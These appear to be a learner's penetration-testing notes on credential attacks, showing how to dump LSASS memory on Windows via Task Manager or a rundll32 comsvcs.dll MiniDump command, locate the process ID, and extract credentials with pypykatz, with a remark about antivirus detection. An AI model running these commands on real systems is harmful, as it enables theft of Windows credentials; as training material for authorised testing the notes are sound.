Credential Attacks

LSASS

Notes and commands for LSASS.

2026-01-02

Tags passwordslsass

Open Task Manager
Select the Processes tab
Find and right click the Local Security Authority Process
Select Create dump file

A file called lsass.DMP is created and saved in %temp%. This is the file we will transfer to our attack host. We can use the file transfer method discussed in the previous section of this module to transfer the dump file to our attack host.

Alternative is rundll32.exe -> but becareful ANTIvirus detects it.

But to do so

we need PID of lsass.exe:

Terminal

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
C:\Windows\system32> tasklist /svc

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
Registry                        96 N/A
smss.exe                       344 N/A
csrss.exe                      432 N/A
wininit.exe                    508 N/A
csrss.exe                      520 N/A
winlogon.exe                   580 N/A
services.exe                   652 N/A
lsass.exe                      672 KeyIso, SamSs, VaultSvc
svchost.exe                    776 PlugPlay
svchost.exe                    804 BrokerInfrastructure, DcomLaunch, Power,
                                   SystemEventsBroker
fontdrvhost.exe                812 N/A

PowerShell

1
2
3
4
5
PS C:\Windows\system32> Get-Process lsass

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   1260      21     4948      15396       2.56    672   0 lsass

Creating dumpfile

1
PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

Running Pypykatz against the Dumpfile

1
pypykatz lsa minidump /home/peter/Documents/lsass.dmp

Screenshot